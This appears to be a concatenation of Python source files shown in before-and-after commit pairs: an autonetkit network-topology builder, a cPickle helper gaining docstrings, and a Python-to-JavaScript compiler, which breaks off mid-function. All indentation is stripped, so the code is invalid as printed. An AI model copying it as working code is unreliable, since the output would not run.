g_conn.add_edges_from(g_in.edges(type="physical"))
return
tidying @minor
"""Module to build overlay graphs for network design"""
import itertools
import autonetkit
import autonetkit.ank as ank_utils
import autonetkit.ank_messaging as ank_messaging
import autonetkit.anm
import autonetkit.config
import autonetkit.exception
import autonetkit.load.graphml as graphml
import autonetkit.log as log
import networkx as nx
from autonetkit.exception import AutoNetkitException
SETTINGS = autonetkit.config.settings
#TODO: revisit phy_neighbors for eg ASN and use l3_conn instead
#TODO: note that build network now assumes input graph has interface mappings on nodes/edges
__all__ = ['build']
from autonetkit.ank_utils import call_log
@call_log
def load(input_graph_string):
#TODO: look at XML header for file type
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
from autonetkit_cisco import load as cisco_load
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
return # module not present (development module)
else:
input_graph = cisco_load.load(input_graph_string)
# add local deployment host
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'VIRL': {
'deploy': True,
},
}
return input_graph
@call_log
def grid_2d(dim):
"""Creates a 2d grid of dimension dim"""
graph = nx.grid_2d_graph(dim, dim)
for node in graph:
graph.node[node]['asn'] = 1
graph.node[node]['x'] = node[0] * 150
graph.node[node]['y'] = node[1] * 150
graph.node[node]['device_type'] = 'router'
graph.node[node]['platform'] = 'cisco'
graph.node[node]['syntax'] = 'ios_xr'
graph.node[node]['host'] = 'internal'
graph.node[node]['ibgp_role'] = "Peer"
mapping = {node: "%s_%s" % (node[0], node[1]) for node in graph}
# Networkx wipes data if remap with same labels
nx.relabel_nodes(graph, mapping, copy=False)
for index, (src, dst) in enumerate(graph.edges()):
graph[src][dst]['type'] = "physical"
# add global index for sorting
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'cisco': {
'deploy': True,
},
}
return graph
@call_log
def initialise(input_graph):
"""Initialises the input graph with from a NetworkX graph"""
anm = autonetkit.anm.AbstractNetworkModel()
input_undirected = nx.Graph(input_graph)
g_in = anm.add_overlay("input", graph=input_undirected)
# set defaults
if not g_in.data.specified_int_names:
# if not specified then automatically assign interface names
g_in.data.specified_int_names = False
#import autonetkit.plugins.graph_product as graph_product
#graph_product.expand(g_in) # apply graph products if relevant
expand_fqdn = False
# TODO: make this set from config and also in the input file
if expand_fqdn and len(ank_utils.unique_attr(g_in, "asn")) > 1:
# Multiple ASNs set, use label format device.asn
anm.set_node_label(".", ['label', 'asn'])
g_in.update(g_in.routers(platform="junosphere"), syntax="junos")
g_in.update(g_in.routers(platform="dynagen"), syntax="ios")
g_in.update(g_in.routers(platform="netkit"), syntax="quagga")
#TODO: is this used?
g_in.update(g_in.servers(platform="netkit"), syntax="quagga")
autonetkit.ank.set_node_default(g_in, specified_int_names=None)
g_graphics = anm.add_overlay("graphics") # plotting data
g_graphics.add_nodes_from(g_in, retain=['x', 'y', 'device_type',
'label', 'device_subtype', 'asn'])
if g_in.data.Creator == "VIRL":
#TODO: move this to other module
# Multiple ASNs set, use label format device.asn
#anm.set_node_label(".", ['label_full'])
pass
return anm
@call_log
def check_server_asns(anm):
"""Checks that servers have appropriate ASN allocated.
Warns and auto-corrects servers which are connected to routers of a difference AS.
#TODO: provide manual over-ride for this auto-correct.
"""
#TODO: Move to validate module?
g_phy = anm['phy']
for server in g_phy.servers():
if server.device_subtype in ("SNAT", "FLAT"):
continue # Don't warn on ASN for NAT elements
l3_neighbors = list(server['l3_conn'].neighbors())
l3_neighbor_asns = set(n.asn for n in l3_neighbors)
if server.asn not in l3_neighbor_asns:
neighs_with_asn = ["%s: AS %s" % (n, n.asn)
for n in l3_neighbors] # tuples for warning message
server.log.warning("Server does not belong to same ASN as neighbors %s" % (neighs_with_asn))
if len(l3_neighbors) == 1:
# single ASN of neighbor -> auto correct
if server['input'].default_asn:
neigh_asn = l3_neighbor_asns.pop()
log.warning("Updating server %s AS from %s to %s" % (server, server.asn, neigh_asn))
server.asn = neigh_asn
else:
log.info("Server %s ASN %s explictly set by user, not auto-correcting" %
(server, server.asn))
@call_log
def apply_design_rules(anm):
"""Applies appropriate design rules to ANM"""
g_in = anm['input']
build_phy(anm)
g_phy = anm['phy']
build_l3_connectivity(anm)
check_server_asns(anm)
from autonetkit.design.mpls import build_vrf
build_vrf(anm) # need to do before to add loopbacks before ip allocations
from autonetkit.design.ip import build_ip, build_ipv4, build_ipv6
#TODO: replace this with layer2 overlay topology creation
build_ip(anm) # ip infrastructure topology
#TODO: set defaults at the start, rather than inline, ie set g_in.data.address_family then use later
address_family = g_in.data.address_family or "v4" # default is v4
#TODO: can remove the infrastructure now create g_ip seperately
if address_family == "None":
log.info("IP addressing disabled, disabling routing protocol configuration")
anm['phy'].data.enable_routing = False
if address_family == "None":
log.info("IP addressing disabled, skipping IPv4")
anm.add_overlay("ipv4") # create empty so rest of code follows through
g_phy.update(g_phy, use_ipv4 = False)
elif address_family in ("v4", "dual_stack"):
build_ipv4(anm, infrastructure = True)
g_phy.update(g_phy, use_ipv4 = True)
elif address_family == "v6":
# Allocate v4 loopbacks for router ids
build_ipv4(anm, infrastructure = False)
g_phy.update(g_phy, use_ipv4 = False)
#TODO: Create a collision domain overlay for ip addressing - l2 overlay?
if address_family == "None":
log.info("IP addressing disabled, not allocating IPv6")
anm.add_overlay("ipv6") # create empty so rest of code follows through
g_phy.update(g_phy, use_ipv6 = False)
elif address_family in ("v6", "dual_stack"):
build_ipv6(anm)
g_phy.update(g_phy, use_ipv6 = True)
else:
anm.add_overlay("ipv6") # placeholder for compiler logic
default_igp = g_in.data.igp or "ospf"
ank_utils.set_node_default(g_in, igp=default_igp)
ank_utils.copy_attr_from(g_in, g_phy, "include_csr")
try:
from autonetkit_cisco import build_network as cisco_build_network
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
else:
cisco_build_network.pre_design(anm)
from autonetkit.design.igp import build_ospf, build_eigrp, build_isis
build_ospf(anm)
build_eigrp(anm)
build_isis(anm)
from autonetkit.design.bgp import build_bgp
build_bgp(anm)
#autonetkit.update_http(anm)
from autonetkit.design.mpls import mpls_te, mpls_oam
mpls_te(anm)
mpls_oam(anm)
# post-processing
if anm['phy'].data.enable_routing:
from autonetkit.design.mpls import mark_ebgp_vrf, build_ibgp_vpn_v4
mark_ebgp_vrf(anm)
build_ibgp_vpn_v4(anm) # build after bgp as is based on
#autonetkit.update_http(anm)
try:
from autonetkit_cisco import build_network as cisco_build_network
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
else:
cisco_build_network.post_design(anm)
return anm
@call_log
def build(input_graph):
"""Main function to build network overlay topologies"""
anm = None
try:
anm = initialise(input_graph)
anm = apply_design_rules(anm)
#print {str(node): {'x': node.x, 'y': node.y} for node in anm['input']}
import autonetkit
autonetkit.update_http(anm)
except Exception, e:
# Send the visualisation to help debugging
import autonetkit
try:
autonetkit.update_http(anm)
except Exception, e:
# problem with vis -> could be coupled with original exception - raise original
log.warning("Unable to visualise: %s" % e)
raise # raise the original exception
return anm
def remove_parallel_switch_links(anm):
g_phy = anm['phy']
subs = ank_utils.connected_subgraphs(g_phy, g_phy.switches())
for component in subs:
log.debug("Checking for multiple links to switch cluster %s" % str(sorted(component)))
# Collect all links into this cluster
external_edges = []
for switch in component:
for edge in switch.edges():
if edge.dst not in component:
external_edges.append(edge)
# Group by the node they link to
from collections import defaultdict
check_dict = defaultdict(list)
for edge in external_edges:
check_dict[edge.dst].append(edge)
# Check to see if any nodes have more than one link into this aggregate
for dst, edges in check_dict.items():
if len(edges) > 1:
edges_to_remove = sorted(edges)[1:] # remove all but first
interfaces = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges))
interfaces_to_disconnect = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges_to_remove))
dst.log.warning("Multiple edges exist to same switch cluster: %s (%s). Removing edges from interfaces %s" % (
str(sorted(component)), interfaces, interfaces_to_disconnect))
g_phy.remove_edges_from(edges_to_remove)
@call_log
def build_phy(anm):
"""Build physical overlay"""
g_in = anm['input']
g_phy = anm['phy']
g_phy.data.enable_routing = g_in.data.enable_routing
if g_phy.data.enable_routing is None:
g_in.data.enable_routing = True # default if not set
g_phy.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
'specified_int_names',
'device_subtype', 'platform', 'host', 'syntax'])
if g_in.data.Creator == "Topology Zoo Toolset":
ank_utils.copy_attr_from(g_in, g_phy, "Network")
ank_utils.set_node_default(g_phy, Network=None)
g_phy.add_edges_from(g_in.edges(type="physical"))
# TODO: make this automatic if adding to the physical graph?
if g_in.data.Creator == "VIRL":
g_phy.data.mgmt_interfaces_enabled = g_in.data.mgmt_interfaces_enabled
#TODO: remove this code now allocated externally
g_phy.data.mgmt_address_start = g_in.data.mgmt_address_start
g_phy.data.mgmt_address_end = g_in.data.mgmt_address_end
g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
ank_utils.copy_attr_from(g_in, g_phy, "use_cdp")
ank_utils.copy_attr_from(g_in, g_phy, "use_onepk")
ank_utils.copy_attr_from(g_in, g_phy, "label_full")
ank_utils.copy_attr_from(g_in, g_phy, "indices")
ank_utils.copy_attr_from(g_in, g_phy, "dont_configure_static_routing")
ank_utils.copy_attr_from(g_in, g_phy, "server_username")
ank_utils.copy_attr_from(g_in, g_phy, "server_ssh_key")
ank_utils.set_node_default(g_phy, use_ipv4 = False, use_ipv6=False)
g_phy.allocate_interfaces()
for node in g_phy:
for interface in node:
specified_id = interface['input'].get("specified_id")
if specified_id:
interface.specified_id = specified_id # map across
remove_parallel_switch_links(anm)
@call_log
def build_l3_connectivity(anm):
""" creates l3_connectivity graph, which is switch nodes aggregated and exploded"""
#TODO: use this as base for ospf, ebgp, ip, etc rather than exploding in each
g_in = anm['input']
g_l3conn = anm.add_overlay("l3_conn")
g_l3conn.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
'specified_int_names',
'device_subtype', 'platform', 'host', 'syntax'])
g_l3conn.add_nodes_from(g_in.switches(), retain=['asn'])
g_l3conn.add_edges_from(g_in.edges())
ank_utils.aggregate_nodes(g_l3conn, g_l3conn.switches())
exploded_edges = ank_utils.explode_nodes(g_l3conn,
g_l3conn.switches())
for edge in exploded_edges:
edge.multipoint = True
edge.src_int.multipoint = True
edge.dst_int.multipoint = True
@call_log
def build_conn(anm):
"""Build connectivity overlay"""
g_in = anm['input']
g_conn = anm.add_overlay("conn", directed=True)
g_conn.add_nodes_from(g_in, retain=['label'])
g_conn.add_edges_from(g_in.edges(type="physical"))
return
|
# -*- coding: utf-8 -*-
import cPickle
load = cPickle.load
loads = cPickle.loads
def dump(obj, f):
return cPickle.dump(obj, f, protocol=cPickle.HIGHEST_PROTOCOL)
def dumps(obj):
return cPickle.dumps(obj, protocol=cPickle.HIGHEST_PROTOCOL)
jukoro.pickle docstrings
# -*- coding: utf-8 -*-
"""
Module to pickle/unpickle Python objects using highest pickle protocol
by default
"""
import cPickle
load = cPickle.load
loads = cPickle.loads
def dump(obj, f):
"""
Write an object in pickle format to the given file
:param obj: object to pickle
:param f: file to write pickled object to
"""
cPickle.dump(obj, f, protocol=cPickle.HIGHEST_PROTOCOL)
def dumps(obj):
"""
Return a string containing an object in pickle format
:param obj: object to pickle
:return: pickled object
:rtype: str
"""
return cPickle.dumps(obj, protocol=cPickle.HIGHEST_PROTOCOL)
|
# -*- coding: utf-8 -*-
#==============================================================================
# Copyright: Hybrid Labs
# Licence: See LICENSE
#==============================================================================
from __future__ import absolute_import
import ast
import inspect
import json
import sys
from types import ModuleType
class JSCode(object):
def __init__(self, code):
pass
class YieldPoint(object):
def __init__(self):
self.count = 0
def create(self):
self.count += 1
return self.count
class YieldSearch(ast.NodeVisitor):
def visit_Yield(self, node):
self.found_yield = True
def visit_FunctionDef(self, node):
pass
class JSCompiler(ast.NodeVisitor):
KEYWORDS = ['default', 'switch', 'throw']
BOOL_OP = {
ast.And: '&&',
ast.Or: '||',
}
BIN_OP = {
ast.Add: '+',
ast.Sub: '-',
ast.Mult: '*',
ast.Div: '/',
ast.Mod: '%',
ast.LShift: '<<',
ast.RShift: '>>',
ast.BitOr: '|',
ast.BitXor: '^',
ast.BitAnd: '&',
}
UNARY_OP = {
ast.Invert: '~',
ast.Not: '!',
ast.UAdd: '+',
ast.USub: '-',
}
COMPARE_OP = {
ast.Eq: '==',
ast.NotEq: '!=',
ast.Lt: '<',
ast.LtE: '<=',
ast.Gt: '>',
ast.GtE: '>=',
ast.Is: '===',
ast.IsNot: '!==',
}
def __init__(self, obj):
self.obj = obj
self.node_chain = [None]
if isinstance(obj, ModuleType):
self.module = obj
else:
self.module = sys.modules.get(getattr(obj, '__module__', None))
def visit(self, node, context=None, inherit=True):
node.parent = self.node_chain[-1]
node.context = getattr(node, 'context', context)
if inherit and node.parent:
node.yield_point = getattr(node.parent, 'yield_point', None)
node.loop_point = getattr(node.parent, 'loop_point', None)
node.break_point = getattr(node.parent, 'break_point', None)
node.context = node.context or node.parent.context
else:
node.yield_point = None
node.loop_point = None
node.break_point = None
self.node_chain.append(node)
ret = super(JSCompiler, self).visit(node)
self.node_chain.pop()
return ret
def lookup(self, name):
from . import types, builtins
from .. import client, model
if name == 'object':
return 'Object'
elif name == 'print':
return name
value = (getattr(types, name, None) or getattr(builtins, name, None) or
getattr(self.module, name, None))
if value is None:
return None
elif value is client.session:
return '_session'
elif value is model.model:
return 'avalon.model'
return self.safe_name(name)
def safe_name(self, name):
if name in JSCompiler.KEYWORDS:
return name + '_'
return name
def generic_visit(self, node):
raise NotImplementedError(node)
# Module(stmt* body)
def visit_Module(self, node):
tpl = []
for child in node.body:
extend(tpl, self.visit(child))
return '\n'.join(tpl)
# Return(expr? value)
def visit_Return(self, node):
if node.value:
return 'return {0};'.format(self.visit(node.value))
else:
return 'return;'
# FunctionDef(
# identifier name, arguments args, stmt* body, expr* decorator_list)
def visit_FunctionDef(self, node, bound=False):
context = node.context or 'this'
args = [self.visit(a, inherit=False) for a in node.args.args]
arg0 = args[0] if bound else None
args = args[1:] if bound else args
local = ', '.join(['{0}: {0}'.format(a) for a in args])
args = ', '.join(args)
node.name = self.safe_name(node.name)
tpl = [
'{0}.{1} = function {1}({2}) {{'.format(context, node.name, args),
' var $exception;',
' var $ctx = {next_state: 0, ctx: this, try_stack: []};',
' $ctx.local = {{{0}}};'.format(local),
' $ctx.local.{0} = this;'.format(arg0) if arg0 else '',
' $ctx.func = function($ctx) {',
' while (true) try { switch($ctx.next_state) {',
' case 0:'
]
node.yield_point = YieldPoint()
for c in node.body:
extend(tpl, indent(self.visit(c, '$ctx.local'), level=3))
extend(tpl, [
' default: $ctx.end = true; return;',
' }} catch($e) {',
' $exception = $e;',
' $ctx.next_state = $ctx.try_stack.pop();',
' if ($ctx.next_state === undefined) throw $exception;',
' continue;',
' }',
' }',
])
if is_generator(node):
extend(tpl, indent('return new generator($ctx);'))
else:
extend(tpl, indent('return $ctx.func.call(this, $ctx);'))
extend(tpl, '};')
return tpl
#ClassDef(identifier name, expr* bases, stmt* body, expr* decorator_list)
def visit_ClassDef(self, node):
from .. import client
if len(node.bases) > 1:
raise NotImplementedError('Multiple inheritance not supported')
tpl = []
context = node.context or 'this'
if node.bases:
if isinstance(node.bases[0], ast.Attribute):
scope_name = node.bases[0].attr
scope = client._scopes.get(scope_name, None)
if scope:
return self.visit_ClientScope(node, scope)
args = []
for c in node.body:
if isinstance(c, ast.FunctionDef) and c.name == '__init__':
args = [self.visit(a, inherit=False) for a in c.args.args]
# Constructor
node.name = self.safe_name(node.name)
extend(tpl, '{0}.{1} = function {1}({2}) {{'.format(
context, node.name, ', '.join(args[1:])))
# Allow object creation without using `new`
extend(tpl, ' if (!(this instanceof {0})) return new {0}({1});'.
format(node.name, ', '.join(args[1:])))
for c in node.body:
if not isinstance(c, ast.FunctionDef):
extend(tpl, indent(self.visit(c)))
extend(tpl, ' if (this.__init__) this.__init__({0});'.
format(', '.join(args[1:])))
extend(tpl, '};')
# Class body
prototype = '%s.%s.prototype' % (context, node.name)
if node.bases:
extend(tpl, [
'var $F = function() {};',
'$F.prototype = %s.prototype;' % self.visit(node.bases[0]),
'%s.%s.prototype = new $F();' % (context, node.name)
])
for c in node.body:
if isinstance(c, ast.FunctionDef):
c.context = prototype
extend(tpl, self.visit_FunctionDef(c, bound=True))
return tpl
def visit_ClientScope(self, node, scope):
context = node.context or 'this'
inject = ['$scope', '$element']
tpl = [
'{0}.{1} = function {2}({3}) {{'.format(
context, scope['name'], node.name, ', '.join(inject))
]
for c in node.body:
extend(tpl, indent(self.visit(c, '$scope')))
# Events
tpl_on = '\n'.join(indent([
'$element.on("{0}", "{1}", function eventHandler(e) {{',
' var t = angular.element(e.target).scope();',
' $scope.$apply(function() {{ $scope.{2}($scope, t, e) }});',
'}})'
]))
extend(tpl, [tpl_on.format(*e) for e in scope['events']])
extend(tpl, indent([
'$scope.$on("$destroy", function() {',
' $element.off();',
'})'
]))
# Support repeat scope
extend(tpl, indent([
'var $getattr = $scope.__getattr__;',
'$scope.__getattr__ = function __getattr__(self, value) {',
' return self.$item && self.$item[value] ||',
' $getattr && $getattr(self, value);',
'}'
]))
# Scope constructor
extend(tpl, indent([
'if ($scope.__init__) {',
' var __init__ = $scope.__init__;',
' delete $scope.__init__;',
' __init__($scope);',
'}'
]))
return extend(tpl, [
'};', '{0}.{1}.$inject = {2};'.format(
context, scope['name'], json.dumps(inject))
])
# Assign(expr* targets, expr value)
def visit_Assign(self, node):
tpl = []
context = getattr(node, 'context', None)
if isinstance(node.value, ast.Yield):
if getattr(node, 'yield_point', None):
node.value.yield_point = node.yield_point
extend(tpl, self.visit(node.value))
extend(tpl, 'var $assign = $ctx.send;')
else:
extend(tpl, 'var $assign = {0};'.format(self.visit(node.value)))
for target in node.targets:
if isinstance(target, ast.Tuple):
for i, t in enumerate(target.elts):
t = self.visit(t)
if not context:
tpl.append('var {0} = $assign[{1}];'.format(t, i))
tpl.append('{0} = $assign[{1}];'.format(t, i))
else:
target = self.visit(target)
if not context:
tpl.append('var {0} = $assign;'.format(target))
tpl.append('{0} = $assign;'.format(target))
return tpl
# AugAssign(expr target, operator op, expr value)
def visit_AugAssign(self, node):
target = self.visit(node.target)
op = JSCompiler.BIN_OP[type(node.op)]
value = self.visit(node.value)
return '{0} {1}= {2};'.format(target, op, value)
# For(expr target, expr iter, stmt* body, stmt* orelse)
def visit_For(self, node):
if node.orelse:
raise NotImplementedError('For else statement not supported')
if not hasattr(node, 'yield_point'):
raise SyntaxError('For statement not inside a function block')
tpl = []
node.loop_point = loop_point = node.yield_point.create()
node.break_point = break_point = node.yield_point.create()
try_except_point = node.yield_point.create()
try_continue_point = node.yield_point.create()
target_node = ast.Name('iter', None)
assign_node = ast.Assign([target_node], node.iter)
assign_node.context = '$ctx.local'
extend(tpl, self.visit_Assign(assign_node))
extend(tpl, [
'case {0}:'.format(loop_point),
'$ctx.try_stack.push({0});'.format(try_except_point),
'{0} = $ctx.local.iter.next();'.format(self.visit(node.target)),
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point),
'if ($exception instanceof StopIteration) {',
' $ctx.next_state = {0}; continue; '.format(break_point),
'}',
'throw $exception;',
'case {0}:'.format(try_continue_point)
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# While(expr test, stmt* body, stmt* orelse)
def visit_While(self, node):
if node.orelse:
raise NotImplementedError('While else statement not supported')
if not hasattr(node, 'yield_point'):
raise SyntaxError('While statement not inside a function block')
tpl = []
loop_point = node.yield_point.create()
break_point = node.yield_point.create()
extend(tpl, [
'case {0}:'.format(loop_point),
'if (!({0})) {{'.format(self.visit(node.test)),
' $ctx.next_state = {0}; continue;'.format(break_point),
'}'
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# Print(expr? dest, expr* values, bool nl)
def visit_Print(self, node):
return 'console.log({0});'.format(
', '.join([self.visit(v) for v in node.values]))
# If(expr test, stmt* body, stmt* orelse)
def visit_If(self, node):
tpl = ['if ({0}) {{'.format(self.visit(node.test))]
for c in node.body:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
if node.orelse:
tpl.append('else {')
for c in node.orelse:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
return tpl
# Py2: Raise(expr? type, expr? inst, expr? tback)
# Py3: Raise(expr? exc, expr? cause)
def visit_Raise(self, node):
if hasattr(node, 'type'):
return 'throw {0}'.format(self.visit(node.type))
else:
return 'throw {0}'.format(self.visit(node.exc))
# TryExcept(stmt* body, excepthandler* handlers, stmt* orelse)
def visit_TryExcept(self, node):
if not getattr(node, 'yield_point', None):
raise SyntaxError('Try block not inside a function block')
try_except_point = node.yield_point.create()
try_continue_point = node.yield_point.create()
tpl = ['$ctx.try_stack.push({0});'.format(try_except_point)]
for c in node.body:
extend(tpl, self.visit(c))
extend(tpl, [
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point)
])
for c in node.handlers:
extend(tpl, self.visit(c))
extend(tpl, 'case {0}:'.format(try_continue_point))
return tpl
# Try(stmt* body, excepthandler* handlers, stmt* orelse, stmt* finalbody)
def visit_Try(self, node):
return self.visit_TryExcept(node)
# Import(alias* names)
def visit_Import(self, node):
return ''
# ImportFrom(identifier? module, alias* names, int? level)
def visit_ImportFrom(self, node):
return ''
# Expr(expr value)
def visit_Expr(self, node):
return self.visit(node.value)
# Pass
def visit_Pass(self, node):
return ['// pass']
# Break
def visit_Break(self, node):
if not node.break_point:
raise SyntaxError('Break not inside a loop block')
return '$ctx.next_state = {0}; continue;'.format(node.break_point)
# Continue
def visit_Continue(self, node):
if not node.loop_point:
raise SyntaxError('Continue not inside a loop block')
return '$ctx.next_state = {0}; continue;'.format(node.loop_point)
# BoolOp(boolop op, expr* values)
def visit_BoolOp(self, node):
op = JSCompiler.BOOL_OP[type(node.op)]
return '({0})'.format(op.join([self.visit(v) for v in node.values]))
# BinOp(expr left, operator op, expr right)
def visit_BinOp(self, node):
left = self.visit(node.left)
op = JSCompiler.BIN_OP[type(node.op)]
right = self.visit(node.right)
return '{0} {1} {2}'.format(left, op, right)
# UnaryOp(unaryop op, expr operand)
def visit_UnaryOp(self, node):
op = JSCompiler.UNARY_OP[type(node.op)]
operand = self.visit(node.operand)
return '{0}({1})'.format(op, operand)
# Dict(expr* keys, expr* values)
def visit_Dict(self, node):
return '{{ {0} }}'.format(', '.join([
'{0}: {1}'.format(self.visit(kv[0]), self.visit(kv[1]))
for kv in zip(node.keys, node.values)
]))
# Yield(expr? value)
def visit_Yield(self, node):
if not getattr(node, 'yield_point', None):
raise SyntaxError('Yield not inside a function block')
yield_point = node.yield_point.create()
return [
'var $tmp = {0};'.format(self.visit(node.value)),
'$ctx.next_state = {0};'.format(yield_point),
'$ctx.result = $tmp;',
'return $ctx;',
'case {0}:'.format(yield_point),
]
#Compare(expr left, cmpop* ops, expr* comparators)
def visit_Compare(self, node):
left = self.visit(node.left)
ops = [JSCompiler.COMPARE_OP[type(op)] for op in node.ops]
comparators = [self.visit(c) for c in node.comparators]
tpl = []
for op, right in zip(ops, comparators):
tpl.append('{0} {1} {2}'.format(left, op, right))
left = right
return '&&'.join(tpl)
# Call(
# expr func, expr* args, keyword* keywords, xpr? starargs, expr? kwargs)
def visit_Call(self, node):
func = self.visit(node.func)
if isinstance(node.func, ast.Attribute):
func_context = self.visit(node.func.value)
else:
func_context = 'this'
if getattr(self.module, func, None) is JSCode:
return node.args[0].s
if func == 'print':
node.values = node.args
return self.visit_Print(node)
args = ', '.join([self.visit(a) for a in node.args])
return '{0}.apply({1}, [{2}])'.format(func, func_context, args)
# Num(object n)
def visit_Num(self, node):
return str(node.n)
# Str(string s)
def visit_Str(self, node):
return '"{0}"'.format(node.s).replace('\n', '\\n\\\n')
# Attribute(expr value, identifier attr, expr_context ctx)
def visit_Attribute(self, node):
if isinstance(node.ctx, ast.Load):
tpl = 'getattr({0}, "{1}")'
else:
tpl = '{0}.{1}'
return tpl.format(self.visit(node.value), node.attr)
# Subscript(expr value, slice slice, expr_context ctx)
def visit_Subscript(self, node):
value = self.visit(node.value)
index = self.visit(node.slice)
return '{0}[{1}]'.format(value, index)
# Name(identifier id, expr_context ctx)
def visit_Name(self, node):
lookup = self.lookup(node.id)
if lookup:
return lookup
elif node.id == 'None':
return 'undefined'
elif node.id == 'True':
return 'true'
elif node.id == 'False':
return 'false'
if getattr(node, 'context', None):
return '{0}.{1}'.format(node.context, node.id)
else:
return node.id
# List(expr* elts, expr_context ctx)
def visit_List(self, node):
return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
# Tuple(expr* elts, expr_context ctx)
def visit_Tuple(self, node):
return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
# Index(expr value)
def visit_Index(self, node):
return self.visit(node.value)
# ExceptHandler(expr? type, identifier? name, stmt* body)
def visit_ExceptHandler(self, node):
tpl = []
if node.type:
tpl.append('if ($exception instanceof {0}) {{'.format(
self.visit(node.type)))
else:
tpl.append('if ($exception) {')
for c in node.body:
extend(tpl, indent(self.visit(c)))
tpl.append(indent('$exception = undefined;'))
tpl.append('}')
return tpl
# arg = (identifier arg, expr? annotation)
def visit_arg(self, node):
return str(node.arg)
def indent(lines, spaces=2, level=1):
spaces = ' ' * (spaces * level)
if isinstance(lines, list):
return ['{0}{1}'.format(spaces, l) for l in lines]
else:
return '{0}{1}'.format(spaces, lines)
def extend(template, lines):
if isinstance(lines, list):
template.extend(lines)
else:
template.append(lines)
return template
def is_generator(node):
searcher = YieldSearch()
searcher.found_yield = False
if isinstance(node, ast.FunctionDef):
for c in node.body:
searcher.visit(c)
else:
searcher.visit(node)
return searcher.found_yield
def js_compile(obj):
if not getattr(obj, '__js__', None):
node = ast.parse(inspect.getsource(obj))
obj.__js__ = JSCompiler(obj).visit(node)
return obj.__js__
def runtime():
from . import types, builtins
return js_compile(types) + js_compile(builtins)
Compiler: rename yield point to branch and cleanup
# -*- coding: utf-8 -*-
#==============================================================================
# Copyright: Hybrid Labs
# Licence: See LICENSE
#==============================================================================
from __future__ import absolute_import
import ast
import inspect
import json
import sys
from types import ModuleType
class JSCode(object):
def __init__(self, code):
pass
class BranchPoint(object):
def __init__(self):
self.count = 0
def create(self):
self.count += 1
return self.count
class YieldSearch(ast.NodeVisitor):
def visit_Yield(self, node):
self.found_yield = True
def visit_FunctionDef(self, node):
pass
class JSCompiler(ast.NodeVisitor):
KEYWORDS = ['default', 'switch', 'throw']
BOOL_OP = {
ast.And: '&&',
ast.Or: '||',
}
BIN_OP = {
ast.Add: '+',
ast.Sub: '-',
ast.Mult: '*',
ast.Div: '/',
ast.Mod: '%',
ast.LShift: '<<',
ast.RShift: '>>',
ast.BitOr: '|',
ast.BitXor: '^',
ast.BitAnd: '&',
}
UNARY_OP = {
ast.Invert: '~',
ast.Not: '!',
ast.UAdd: '+',
ast.USub: '-',
}
COMPARE_OP = {
ast.Eq: '==',
ast.NotEq: '!=',
ast.Lt: '<',
ast.LtE: '<=',
ast.Gt: '>',
ast.GtE: '>=',
ast.Is: '===',
ast.IsNot: '!==',
}
def __init__(self, obj):
self.obj = obj
self.node_chain = [None]
if isinstance(obj, ModuleType):
self.module = obj
else:
self.module = sys.modules.get(getattr(obj, '__module__', None))
def visit(self, node, context=None, inherit=True):
node.parent = self.node_chain[-1]
node.context = getattr(node, 'context', context)
if inherit and node.parent:
node.branch = getattr(node.parent, 'branch', None)
node.loop_point = getattr(node.parent, 'loop_point', None)
node.break_point = getattr(node.parent, 'break_point', None)
node.context = node.context or node.parent.context
else:
node.branch = None
node.loop_point = None
node.break_point = None
self.node_chain.append(node)
ret = super(JSCompiler, self).visit(node)
self.node_chain.pop()
return ret
def lookup(self, name):
from . import types, builtins
from .. import client, model
if name == 'object':
return 'Object'
elif name == 'print':
return name
value = (getattr(types, name, None) or getattr(builtins, name, None) or
getattr(self.module, name, None))
if value is None:
return None
elif value is client.session:
return '_session'
elif value is model.model:
return 'avalon.model'
return self.safe_name(name)
def safe_name(self, name):
if name in JSCompiler.KEYWORDS:
return name + '_'
return name
def generic_visit(self, node):
raise NotImplementedError(node)
# Module(stmt* body)
def visit_Module(self, node):
tpl = []
for child in node.body:
extend(tpl, self.visit(child))
return '\n'.join(tpl)
# Return(expr? value)
def visit_Return(self, node):
if node.value:
return 'return {0};'.format(self.visit(node.value))
else:
return 'return;'
# FunctionDef(
# identifier name, arguments args, stmt* body, expr* decorator_list)
def visit_FunctionDef(self, node, bound=False):
context = node.context or 'this'
args = [self.visit(a, inherit=False) for a in node.args.args]
arg0 = args[0] if bound else None
args = args[1:] if bound else args
local = ', '.join(['{0}: {0}'.format(a) for a in args])
args = ', '.join(args)
node.name = self.safe_name(node.name)
tpl = [
'{0}.{1} = function {1}({2}) {{'.format(context, node.name, args),
' var $exception;',
' var $ctx = {next_state: 0, ctx: this, try_stack: []};',
' $ctx.local = {{{0}}};'.format(local),
' $ctx.local.{0} = this;'.format(arg0) if arg0 else '',
' $ctx.func = function($ctx) {',
' while (true) try { switch($ctx.next_state) {',
' case 0:'
]
node.branch = BranchPoint()
for c in node.body:
extend(tpl, indent(self.visit(c, '$ctx.local'), level=3))
extend(tpl, [
' default: $ctx.end = true; return;',
' }} catch($e) {',
' $exception = $e;',
